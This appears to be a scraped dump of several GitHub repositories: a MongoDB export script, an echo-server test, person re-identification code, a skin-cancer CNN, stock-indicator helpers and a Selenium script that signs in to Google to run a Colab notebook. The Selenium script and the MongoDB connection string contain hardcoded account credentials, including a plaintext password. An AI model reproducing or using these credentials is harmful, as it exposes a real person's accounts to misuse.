"path": "/build/lib/Parser/atlasread.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport csv\nfrom pymongo import MongoClient\n\nclient=MongoClient('mongodb+srv://diegolanus:[email protected]/test?retryWrites=true')\n\ndb = client.coreTec\nelements = db.coreTest.find().count()\nfivestarcount = db.coreTest.find()\neach = (list(fivestarcount))\nData=list()\nheader= [\"ParcialA\"]\n\nfor k in range(1,elements):\n row={}\n for field in header:\n row[field]=each[k][field]\n Data.append(row[\"ParcialA\"])\ndf = pd.DataFrame(data={\"ParcialA\":Data})\ndf.to_csv(\"./notas.csv\", sep=',',index=False)\n\n\nclient.close"
}
] | 7 |
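
The scraping loop in `Parser/parserNotas.py` above collects `th`/`td` cells row by row into a DataFrame. For reference, the same table can often be extracted in a single call with `pandas.read_html`; a minimal sketch, assuming the authenticated page HTML returned by `parsear()` and an installed `lxml` parser (the table class comes from the code above, while the helper name is illustrative):

```python
import pandas as pd

def table_from_html(html: str) -> pd.DataFrame:
    # read_html returns one DataFrame per matching <table>;
    # the grade report page carries a single grader table.
    tables = pd.read_html(html, attrs={"class": "gradereport-grader-table"})
    return tables[0]
```

The manual BeautifulSoup version keeps finer control over empty cells, which is why the repo filters with `if ele` on every row.
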
aniliitb10/BoostAsio
|
https://github.com/aniliitb10/BoostAsio
|
8af5d39af73afd3c3602a200bc253bc7875cc278
|
06dbabe5864f90e53da860f28c1dbe021717093e
|
f5f76abb9a50645ffb06add4094d1d2170e79f78
|
refs/heads/master
| 2023-06-14T04:35:35.008653 | 2021-07-02T11:08:23 | 2021-07-02T11:08:23 | 382,321,175 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7835051417350769,
"alphanum_fraction": 0.8092783689498901,
"avg_line_length": 26.714284896850586,
"blob_id": "81699411f86a112ba76e8515ffa63c0e7232db35",
"content_id": "7a5d8c17f6945ec314d0750898556ca8c138cd56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 7,
"path": "/CMakeLists.txt",
"repo_name": "aniliitb10/BoostAsio",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.19)\nproject(BoostAsio)\n\nset(CMAKE_CXX_STANDARD 17)\n\nadd_executable(async_echo_server async_tcp_echo_server.cpp)\ntarget_link_libraries(async_echo_server pthread)\n"
},
{
"alpha_fraction": 0.5803782343864441,
"alphanum_fraction": 0.5898345112800598,
"avg_line_length": 29.781818389892578,
"blob_id": "28e0cebdd9cd15ff17f5bd9c1661fedf3952840c",
"content_id": "7da46adae39eb8d407544b6f87b9cc09dcfef935",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1692,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 55,
"path": "/python/tcp_one_connection.py",
"repo_name": "aniliitb10/BoostAsio",
"src_encoding": "UTF-8",
"text": "\"\"\"Tests TCP communication between a server and a client.\"\"\"\n\nfrom testplan.testing.multitest import MultiTest, testsuite, testcase\nfrom testplan.testing.multitest.driver.tcp import TCPServer, TCPClient\nfrom testplan.testing.multitest.driver.app import App\nimport re\n\n\n@testsuite\nclass TCPTestsuite(object):\n \"\"\"TCP tests for a server and a client.\"\"\"\n\n def setup(self, env):\n \"\"\"Will be executed before the testcase.\"\"\"\n # env.client.connect()\n\n @testcase\n def send_and_receive_msg(self, env, result):\n \"\"\"\n Client sends a message, server received and responds back.\n \"\"\"\n msg = env.client.cfg.name\n result.log(\"Client is sending: {}\".format(msg))\n bytes_sent = env.client.send_text(msg)\n\n received = env.client.receive_text(size=bytes_sent)\n result.equal(received, msg, \"Client received\")\n\n\ndef get_multitest(name):\n \"\"\"\n Creates and returns a new MultiTest instance to be added to the plan.\n The environment is a server and a client connecting using the context\n functionality that retrieves host/port of the server after is started.\n \"\"\"\n test = MultiTest(\n name=name,\n suites=[TCPTestsuite()],\n environment=[\n App(\n \"echo\",\n binary=\"/home/anil/CLionProjects/BoostAsio/cmake-build-debug/async_echo_server\",\n args=[\"12345\"],\n stdout_regexps=[\n re.compile(r\".*Echo server is up.*\")\n ],\n ),\n TCPClient(\n name=\"client\",\n host=\"127.0.0.1\",\n port=12345,\n ),\n ],\n )\n return test"
}
] | 2 |
honglongcai/MOTDT
|
https://github.com/honglongcai/MOTDT
|
c87835fd4368da985df271e6accff1891d0df8fa
|
20554aefa6f16d69813715f880f0b80b49e03984
|
033f9f0bce66550d3ba16391e6ee8285975b564a
|
refs/heads/master
| 2020-08-03T11:59:31.982348 | 2019-10-06T18:46:30 | 2019-10-06T18:46:30 | 211,745,429 | 0 | 0 |
MIT
| 2019-09-30T00:35:29 | 2019-09-25T06:17:12 | 2019-05-01T18:02:02 | null |
[
{
"alpha_fraction": 0.6189024448394775,
"alphanum_fraction": 0.6189024448394775,
"avg_line_length": 28.636363983154297,
"blob_id": "450bab44978987697212277f372f0c2cc1fea177",
"content_id": "ac9be441e593211a5abe186e8d8b1dfa25a57e61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 656,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 22,
"path": "/models/reid/data.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "import os\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\n\nclass Data(Dataset):\n \"\"\"Dataset class, used when inputting images from a directory\"\"\"\n def __init__(self, data_dir, transform=None):\n photos = os.listdir(data_dir)\n self.data_dir = data_dir\n self.images = [photo for photo in photos]\n self.transform = transform\n \n def __getitem__(self, index):\n photo = os.path.join(self.data_dir, self.images[index])\n img = Image.open(photo)\n img = self.transform(img)\n return img, self.images[index]\n \n def __len__(self):\n return len(self.images)\n "
},
{
"alpha_fraction": 0.6170854568481445,
"alphanum_fraction": 0.643216073513031,
"avg_line_length": 28.264705657958984,
"blob_id": "6679e3c18847209cea3ded5a58888d2460224ad8",
"content_id": "72e3b8016ee5a812f6dd6fc3d59aff981f60b101",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1990,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 68,
"path": "/models/reid/__init__.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom distutils.version import LooseVersion\nimport torch\nfrom torch.autograd import Variable\nfrom torch.nn.parallel import DataParallel\n\nfrom utils import bbox as bbox_utils\nfrom utils.log import logger\nfrom models import net_utils\nfrom .Model import Model\nfrom PIL import Image\n\n\ndef load_reid_model():\n model = DataParallel(Model())\n ckpt = '/home/honglongcai/Github/PretrainedModel/model_410.pt'\n model.load_state_dict(torch.load(ckpt, map_location='cuda'))\n logger.info('Load ReID model from {}'.format(ckpt))\n\n model = model.cuda()\n model.eval()\n return model\n\n\ndef img_process(img):\n img = np.asarray(img)\n img = Image.fromarray(img)\n img = img.resize((128, 384), resample=3)\n img = np.asarray(img)\n img = img[:, :, :3]\n img = img.astype(np.float32)\n img = img / 255\n im_mean = np.array([0.485, 0.456, 0.406])\n im_std = np.array([0.229, 0.224, 0.225])\n img = img - im_mean\n img = img / im_std\n img = np.transpose(img, (2, 0, 1))\n return img\n\n\ndef extract_image_patches(image, bboxes):\n bboxes = np.round(bboxes).astype(np.int)\n bboxes = bbox_utils.clip_boxes(bboxes, image.shape)\n patches = [img_process(image[box[1]:box[3], box[0]:box[2]]) for box in bboxes]\n return np.array(patches)\n\n\ndef extract_reid_features(reid_model, image, tlbrs):\n if len(tlbrs) == 0:\n return torch.FloatTensor()\n\n patches = extract_image_patches(image, tlbrs)\n\n gpu = net_utils.get_device(reid_model)\n if LooseVersion(torch.__version__) > LooseVersion('0.3.1'):\n with torch.no_grad():\n im_var = Variable(torch.from_numpy(patches))\n if gpu is not None:\n im_var = im_var.cuda(gpu).float()\n features = reid_model(im_var).data\n else:\n im_var = Variable(torch.from_numpy(patches), volatile=True)\n if gpu is not None:\n im_var = im_var.cuda(gpu)\n features = reid_model(im_var).data\n\n return features\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5640616416931152,
"avg_line_length": 39.014183044433594,
"blob_id": "a7034aa77c2404da5a3c455ab0f8cf4a50dbd63c",
"content_id": "296c20a5c810e77bade90b119e0b5d655023840e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5643,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 141,
"path": "/models/reid/getfeature.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "\"\"\"@Desc: ReID script version 2.1.0 for attention mgn model\n@Result: Suning55ID: mAP: 90.1%\n@Result: Suning763ID: mAP: 53.4%\n@Time Consumption: 250fps under one GPU\n@Date: created this script by Honglong Cai on 04/03/2019\n@Data: updated by Honglong Cai on 04/22/2019\n@Requirements:\n python >= 3.6\n pytorch >= 0.4.1\n torchvision >= 0.1.9\n PIL >= 5.3.0\n@Image input: images can be inputted either as an single image \\\n or from a directory\n@CPU/GPU support: support both cpu and gpu\n@Call format: python getfeature.py model_weight photo_path --sys_device_ids\n ----- photo_path can be either a single image or an image directory\n ----- use --sys_device_ids '' when running at cpu environment\n ----- use --sys_device_ids 0 when running at gpu:0\n ----- use --sys_device_ids 0,1 or any when running at multiple gpu\n@run at 'cpu': python getfeature.py /Users/honglongcai/model.pt \\\n /Users/honglongcai/photo.jpg --sys_device_ids ''\n --sys_device_ids ''\n@Test use 'gpu:0': python getfeature.py /Users/honglongcai/model.pt \\\n /Users/honglongcai/photo.jpg --sys_device_ids 0\n@testing code below shows the detail examples\n\"\"\"\n\n\nimport argparse\nimport os\n\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DataParallel\nfrom torch.utils.data import DataLoader\n\nfrom Model import Model\nfrom data import Data\n\n\nclass GetFeature(object):\n \"\"\"Extract features\n Arguments\n model_weight_file: pre-trained model\n sys_device_ids: cpu/gpu\n \"\"\"\n def __init__(self, model_weight_file, sys_device_ids=''):\n if len(sys_device_ids) > 0:\n os.environ['CUDA_VISIBLE_DEVICES'] = sys_device_ids\n self.sys_device_ids = sys_device_ids\n self.model = DataParallel(Model())\n if torch.cuda.is_available() and self.sys_device_ids != '':\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.model.load_state_dict(torch.load(model_weight_file,\n map_location=device))\n self.model.to(device)\n self.model.eval()\n \n def __call__(self, photo_path=None, batch_size=1):\n \"\"\"\n get global feature and local feature\n :param photo_path : either photo directory or a single image\n :param batch_size : useful only when photo_path is a directory\n :return: feature: numpy array, dim = num_images * 2048,\n photo_name: a list, len = num_images\n \"\"\"\n '''\n if photo_dir is None and photo is None:\n raise self.InputError('Error: both photo_path '\n 'and images is None.')\n if photo_dir and photo:\n raise self.InputError('Error: only need one argument, '\n 'either photo_path or images.')\n '''\n # input is a directory\n if os.path.isdir(photo_path):\n dataset = Data(photo_path, self._img_process)\n data_loader = DataLoader(dataset, batch_size=batch_size,\n num_workers=8)\n features = torch.FloatTensor()\n photos = []\n for batch, (images, names) in enumerate(data_loader):\n images = images.float()\n if torch.cuda.is_available() and self.sys_device_ids != '':\n images = images.to('cuda')\n feature = self.model(images).data.cpu()\n features = torch.cat((features, feature), 0)\n photos = photos + list(names)\n if batch % 10 == 0:\n print('processing batch: {}'.format(batch))\n features = features.numpy()\n features = features/np.linalg.norm(features, axis=1,\n keepdims=True)\n return features, photos\n # input is a single image\n else:\n photo_name = photo_path.split('/')[-1]\n img = Image.open(photo_path)\n image = self._img_process(img)\n image = np.expand_dims(image, axis=0)\n image = torch.from_numpy(image).float()\n feature = 
self.model(image).data.numpy()\n feature = feature/np.linalg.norm(feature, axis=1,\n keepdims=True)\n return feature, [photo_name]\n \n def _img_process(self, img):\n img = img.resize((128, 384), resample=3)\n img = np.asarray(img)\n img = img[:, :, :3]\n img = img.astype(float)\n img = img / 255\n im_mean = np.array([0.485, 0.456, 0.406])\n im_std = np.array([0.229, 0.224, 0.225])\n img = img - im_mean\n img = img / im_std\n img = np.transpose(img, (2, 0, 1))\n return img\n \n\nif __name__ == '__main__':\n \"\"\"testing code\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('model_weight_file', type=str,\n help='weight file')\n parser.add_argument('photo_path', type=str,\n help='either a image directory or an image')\n parser.add_argument('--sys_device_ids', type=str, default='',\n help='cuda ids')\n parser.add_argument('--batch_size', type=int, default=1,\n help='batch size')\n args = parser.parse_known_args()[0]\n \n get_feature = GetFeature(args.model_weight_file, args.sys_device_ids)\n features, p = get_feature(photo_path=args.photo_path, batch_size=args.batch_size)\n #print(features)\n #print(features.shape)\n #print(features.dtype)\n\n"
}
] | 3 |
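
The `img_process` and `_img_process` routines above normalise a crop to the CHW layout the ReID model expects: resize to 128x384, scale to [0, 1], standardise with ImageNet statistics, then transpose. A minimal self-check of that contract, using only NumPy and Pillow, with a synthetic patch standing in for a detection crop:

```python
import numpy as np
from PIL import Image

# ImageNet statistics, as in the repo code above.
im_mean = np.array([0.485, 0.456, 0.406])
im_std = np.array([0.229, 0.224, 0.225])

def img_process(img):
    # Resize to width 128, height 384 (resample=3 is bicubic).
    img = np.asarray(Image.fromarray(img).resize((128, 384), resample=3))
    img = img[:, :, :3].astype(np.float32) / 255
    img = (img - im_mean) / im_std
    return np.transpose(img, (2, 0, 1))  # HWC -> CHW

patch = np.random.randint(0, 255, size=(100, 50, 3), dtype=np.uint8)
out = img_process(patch)
assert out.shape == (3, 384, 128)  # channels, height, width
```
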
EsraSendel/Skin_Cancer
|
https://github.com/EsraSendel/Skin_Cancer
|
143ace844fb9d414514e10c3fc714d5b452a1e26
|
d86af05c58ae43097f4cf214f3e377b2cd1c5d68
|
6da871d4bc30089b4f5242815f01f20e520005fa
|
refs/heads/main
| 2023-07-14T14:29:59.883987 | 2021-08-12T13:40:33 | 2021-08-12T13:40:33 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6591421961784363,
"alphanum_fraction": 0.6862302422523499,
"avg_line_length": 29.481651306152344,
"blob_id": "0896138068030f9ccaabfdda6b276cbe357ffb31",
"content_id": "1e2bc34ab6bf275aac32912d940548f45c668a16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6645,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 218,
"path": "/skincaner.py",
"repo_name": "EsraSendel/Skin_Cancer",
"src_encoding": "UTF-8",
"text": "###### I've used Google Colab to do the training (Some lines may differ when training locally) ######\n\n\"\"\"\nSkin cancer lesion classification using the HAM10000 dataset\n\nDataset link:\nhttps://www.kaggle.com/kmader/skin-cancer-mnist-ham10000\n\n\"\"\"\n\n### Google Colab ###\n#To Download Data\n! kaggle datasets download -d kmader/skin-cancer-mnist-ham10000\n\n#Unzip files\n!unzip skin-cancer-mnist-ham10000.zip\n### Google Colab ###\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nfrom glob import glob\nfrom PIL import Image\nfrom sklearn.metrics import confusion_matrix\n\nimport keras\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D, BatchNormalization\nfrom sklearn.model_selection import train_test_split\nfrom scipy import stats\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils import resample\n\nSIZE=32\nnp.random.seed(42)\n\n\n#Read CSV file\nskin_df = pd.read_csv('/path/HAM10000_metadata.csv')\n\n#Read images based on ID from CSV\nimage_path = {os.path.splitext(os.path.basename(x))[0]: x\n for x in glob(os.path.join('/path/', '*', '*.jpg'))}\n\n#Add the image path(s) to datafram(skin_df) as a new column \nskin_df['path'] = skin_df['image_id'].map(image_path.get)\n\n#Use the path(s) to read image(s) --> resize images into 32X32 --> convert images into np.array --> add them into a new column\nskin_df['image'] = skin_df['path'].map(lambda x: np.asarray(Image.open(x).resize((32,32))))\n\n##### Plotting #####\nn_samples = 5\n# Plotting\nfig, m_axs = plt.subplots(7, n_samples, figsize = (4*n_samples, 3*7))\nfor n_axs, (type_name, type_rows) in zip(m_axs, \n skin_df.sort_values(['dx']).groupby('dx')):\n n_axs[0].set_title(type_name)\n for c_ax, (_, c_row) in zip(n_axs, type_rows.sample(n_samples, random_state=1234).iterrows()):\n c_ax.imshow(c_row['image'])\n c_ax.axis('off')\n##### Plotting #####\n \n \n#Label encoding --> From text to numeric values\nle = LabelEncoder()\nle.fit(skin_df['dx'])\nLabelEncoder()\n#Transform and Add those labels to dataframe(skin_df) as a new column\nskin_df['label']=le.transform(skin_df['dx'])\n\n\n#######Plotting#########\n#Data distribution visualization\n#We're just looking at Cell Type(cancer type) since that's what we're gonna deal with\nfig = plt.figure(figsize=(12,8))\n\nax1 = fig.add_subplot(221)\nskin_df['dx'].value_counts().plot(kind='bar', ax=ax1)\nax1.set_ylabel('Count')\nax1.set_title('Cell Type');\n\nplt.tight_layout()\nplt.show()\n#######Plotting#########\n\n\n#Balancing data.\n\n#Get labels and counts --> Assign them into a new DataFrames\ndf_0 = skin_df[skin_df['label'] == 0]\ndf_1 = skin_df[skin_df['label'] == 1]\ndf_2 = skin_df[skin_df['label'] == 2]\ndf_3 = skin_df[skin_df['label'] == 3]\ndf_4 = skin_df[skin_df['label'] == 4]\ndf_5 = skin_df[skin_df['label'] == 5]\ndf_6 = skin_df[skin_df['label'] == 6]\n\n#Resamplling those DataFrames\nn_samples = 1000\ndf_0_balanced = resample(df_0, replace=True, n_samples=n_samples, random_state=42)\ndf_1_balanced = resample(df_1, replace=True, n_samples=n_samples, random_state=42)\ndf_2_balanced = resample(df_2, replace=True, n_samples=n_samples, random_state=42)\ndf_3_balanced = resample(df_3, replace=True, n_samples=n_samples, random_state=42)\ndf_4_balanced = resample(df_4, replace=True, n_samples=n_samples, random_state=42)\ndf_5_balanced = resample(df_5, replace=True, n_samples=n_samples, random_state=42)\ndf_6_balanced = 
resample(df_6, replace=True, n_samples=n_samples, random_state=42)\n\n#Combining those DataFrames to a new Single DataFrame\nskin_df_balanced = pd.concat([df_0_balanced,df_1_balanced,df_2_balanced,df_3_balanced,df_4_balanced,df_5_balanced,df_6_balanced])\n\n#Will check balanced classes\nprint(skin_df_balanced['label'].value_counts())\n\n\n\n\n#Creating the X and Y for Training and Testing\n\n#Converting 'image(s)' from Dataframe(skin_df_balanced) to np.array\nX = np.asarray(skin_df_balanced['image'].tolist())\n#Sclling those values from 0-255 to 0-1.\nX=X/255.\n\n#Assigning 'label(s)' from Dataframe(skin_df_balanced) to Y\nY=skin_df_balanced['label']\n#Since this a multiclass problem we need to conver those Y values into 'categorical'\nY_cat = to_categorical(Y, num_classes=7)\n\n#Will Split Training and Testing\nx_train, x_test, y_train, y_test = train_test_split(X, Y_cat, test_size=0.25, random_state=42)\n\n\n############# Model #################\n\n#Finally, will define the model\nnum_calasses = 7\n\nmodel = Sequential()\nmodel.add(Conv2D(256, (3, 3), activation=\"relu\", input_shape=(SIZE, SIZE, 3)))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, (3, 3), activation=\"relu\"))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(64, (3, 3), activation=\"relu\"))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\n\nmodel.add(Dense(32))\nmodel.add(Dense(7, activation=\"softmax\"))\nmodel.summary()\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"Adam\", metrics=[\"acc\"])\n\n############# Model #################\n\n#Let's Train\n\nbatch_size = 16\nepochs = 85\n\nhistory = model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size, validation_data=(x_test, y_test), verbose=2)\n\n\n#The Final Score\nscore = model.evaluate(x_test, y_test)\nprint('Test Accuracy:', score[1]*100, '%')\n\n\n######### Plotting #########\n#plot the training and validation loss at each epoch\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\nplt.plot(epochs, loss, 'y', label='Training loss')\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.show()\n######### Plotting #########\n\n\n######### Plotting #########\n#plot the training and validation accuracy at each epoch\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nplt.plot(epochs, acc, 'y', label='Training acc')\nplt.plot(epochs, val_acc, 'r', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n######### Plotting #########\n\n\n######### Plotting #########\n#Plot fractional incorrect misclassifications\ncm = confusion_matrix(y_true, y_pred_classes)\nincorr_fraction = 1 - np.diag(cm) / np.sum(cm, axis=1)\nplt.bar(np.arange(7), incorr_fraction)\nplt.xlabel('True Label')\nplt.ylabel('Fraction of incorrect predictions')\n######### Plotting #########\n\n#Saving the model\nmodel.save('skinCancer.h5')\n"
},
{
"alpha_fraction": 0.7431421279907227,
"alphanum_fraction": 0.7705735564231873,
"avg_line_length": 29.846153259277344,
"blob_id": "c483aa753ea53fc052090f07eba517748bc2cbc1",
"content_id": "4f8cf09dc0643ce3fc1cd10952e18dbb1b9acdf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 13,
"path": "/README.md",
"repo_name": "EsraSendel/Skin_Cancer",
"src_encoding": "UTF-8",
"text": "# Skin Cancer\nSkin cancer classification using HAM10000\n\nDataset link - https://www.kaggle.com/kmader/skin-cancer-mnist-ham10000\n\nThere are 7 classes of skin cancer lesions included in this dataset:<br><br>\nMelanocytic nevi (nv)<br>\nMelanoma (mel)<br>\nBenign keratosis-like lesions (bkl)<br>\nBasal cell carcinoma (bcc) <br>\nActinic keratoses (akiec)<br>\nVascular lesions (vas)<br>\nDermatofibroma (df)\n"
}
] | 2 |
shikaru/hack_stock_market
|
https://github.com/shikaru/hack_stock_market
|
0e72635854d944eff8616b3e7e5d0b40730b1cc8
|
d31f92be4f95130454678fe2fc37b56cf1b2dd43
|
4a65af465e594fab9712418f1535d7610aeb8fcc
|
refs/heads/main
| 2023-04-07T23:11:49.309989 | 2021-04-21T06:05:15 | 2021-04-21T06:05:15 | 335,208,170 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6991341710090637,
"avg_line_length": 45.25,
"blob_id": "40a0bf086ec135ff67340c0b0b82d0cd886742c2",
"content_id": "f1c28c9fe42b8641cdfc3a547aff02f71fa0bc9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 924,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 20,
"path": "/get_stock_data/indexes.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "def get_indexes(start=datetime.datetime(2020, 1, 1),end=datetime.datetime(2020, 12, 31),brand='1305.JP',n=14,):\n date=start-datetime.timedelta(days=40)\n stooq = StooqDailyReader(brand, start=date, end=end)\n data = stooq.read()\n #input data must be pandas dataframe\n diff=data[\"Close\"].diff().sort_index(ascending=True)\n up=diff.copy()\n up[up<0]=0\n down=diff.copy()\n down[down>0]=0\n up_sma_14 = up.rolling(window=n, center=False).mean()\n down_sma_14 = down.abs().rolling(window=n, center=False).mean()\n RSI=(up_sma_14)/(down_sma_14+up_sma_14)\n\n #MacD\n short=data[\"Close\"].sort_index(ascending=True).ewm(span=12,adjust=False).mean()\n long=data[\"Close\"].sort_index(ascending=True).ewm(span=26,adjust=False).mean()\n macd=short-long\n signal = macd.ewm(span=9).mean()\n return RSI[30:]*100, macd.sort_index(ascending=True)[30:],signal.sort_index(ascending=True)[30:],data[\"Close\"][:-30].sort_index(ascending=True)"
},
{
"alpha_fraction": 0.6351575255393982,
"alphanum_fraction": 0.6965174078941345,
"avg_line_length": 32.55555725097656,
"blob_id": "e7e82c9bb3c74e6f85d5126ef50c47035f9d4a01",
"content_id": "875d13fe8d69cef505ccb1965e5e289b9bebec96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/get_stock_data/get_rsi.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "from pandas_datareader.stooq import StooqDailyReader\nfrom datetime import datetime\nimport pandas as pd\n\ndef get_rsi(start=datetime(2020, 1, 1),end=datetime(2020, 12, 31),brand='1305.JP',n=14,):\n stooq = StooqDailyReader(brand, start=start, end=end)\n data = stooq.read()\n #input data must be pandas dataframe\n diff=data[\"Close\"].diff()\n up=diff.copy()\n up[up<0]=0\n down=diff.copy()\n down[down>0]=0\n up_sma_14 = up.rolling(window=n, center=False).mean()\n \n down_sma_14 = down.abs().rolling(window=n, center=False).mean()\n RSI=(up_sma_14)/(down_sma_14+up_sma_14)\n return RSI*100, data[\"Close\"]"
},
{
"alpha_fraction": 0.8725489974021912,
"alphanum_fraction": 0.8725489974021912,
"avg_line_length": 33.33333206176758,
"blob_id": "9a23a6616be2bd3556d900f9b532453808845570",
"content_id": "2cdb19a01d2de93baf13932a944982e6a9ac9b96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 3,
"path": "/get_stock_data/__init__.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "from pandas_datareader.stooq import StooqDailyReader\nfrom datetime import datetime\nimport pandas as pd"
},
{
"alpha_fraction": 0.6826608777046204,
"alphanum_fraction": 0.7099236845970154,
"avg_line_length": 29.11864471435547,
"blob_id": "e5617cb8dc5c1da62802ae9fefd4d109e548feff",
"content_id": "d85e319d7534e020b7d250032661607d1dc4c0d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1834,
"license_type": "no_license",
"max_line_length": 245,
"num_lines": 59,
"path": "/click_colab.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "import csv\r\nfrom selenium.webdriver import Chrome, ChromeOptions, Remote\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport lxml.html\r\nimport requests\r\nimport time\r\nimport re\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\n\r\ndef main():\r\n\ttry:\r\n\t\tmail_address = '[email protected]'\r\n\t\tpassword = 'hikaru0823'\r\n\r\n\t\t\r\n\t\toptions=ChromeOptions()\r\n\t\toptions.headless=True\r\n\t\t\r\n\t\toptions.add_argument('--user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0')\r\n\t\tdriver=Chrome(options=options)\r\n\t\t\r\n\r\n\t\turl = 'https://accounts.google.com/signin/v2/identifier?hl=ja&passive=true&continue=https%3A%2F%2Fwww.google.com%2Fwebhp%3Fhl%3Dja%26sa%3DX%26ved%3D0ahUKEwj9jtHspq3vAhUCEqYKHYZ4D84QPAgI&ec=GAZAmgQ&flowName=GlifWebSignIn&flowEntry=ServiceLogin'\r\n\t\tdriver.get(url)\r\n\t\t\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\telement = driver.switch_to.active_element\r\n\t\telement.send_keys(mail_address)\r\n\t\telement.send_keys(Keys.ENTER)\r\n\t\t#driver.find_element_by_id(\"identifierID\").send_keys(mail_address)\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\t\r\n\t\ttime.sleep(60)\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(password)\r\n\t\tdriver.find_element_by_id(\"passwordNext\").click()\r\n\r\n\t\turl='https://colab.research.google.com/drive/1F18kintNY67aG_8LoOdnhuiQtLux7Pqw?usp=sharing'\r\n\r\n\t\tdriver.find_element_by_id(\"input\").send_keys(url)\r\n\t\tdriver.find_element_by_id(\"icon\").click()\r\n\t\t\r\n\t\t\r\n\r\n\t\t\r\n\t\tdriver.save_screenshot('colb.png')\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"runtime-menu-button\"]/div/div/div[1]').click()\r\n\t\tdriver.find_element_by_xpath('//*[@id=\":1w\"]/div').click()\r\n\t\tdriver.save_screenshot('click_colb.png')\r\n\t\tdriver.quit()\r\n\texcept:\r\n\t\tprint(\"error\")\r\n\t\timport traceback\r\n\t\ttraceback.print_exc()\r\n\t\tdriver.quit()\r\n\t\r\nif __name__==\"__main__\":\r\n\tmain()"
}
] | 4 |
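
Both `get_rsi` and `get_indexes` above compute the rolling-mean RSI variant: average gains divided by average gains plus average losses over an `n`-day window. On a toy series the formula is easy to verify by hand; a minimal pandas-only sketch with made-up prices and no Stooq access (`clip` is equivalent to the masked assignments used in the repo):

```python
import pandas as pd

close = pd.Series([10.0, 11, 12, 11, 13, 14, 13, 15, 16, 15, 17, 18, 17, 19, 20])
n = 14

diff = close.diff()
up = diff.clip(lower=0)       # gains, with losses zeroed
down = (-diff).clip(lower=0)  # losses as positive numbers
up_sma = up.rolling(window=n).mean()
down_sma = down.rolling(window=n).mean()
rsi = 100 * up_sma / (up_sma + down_sma)

print(rsi.dropna())  # first value appears once n observations exist
```
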
Nirav8/Falsk_server
|
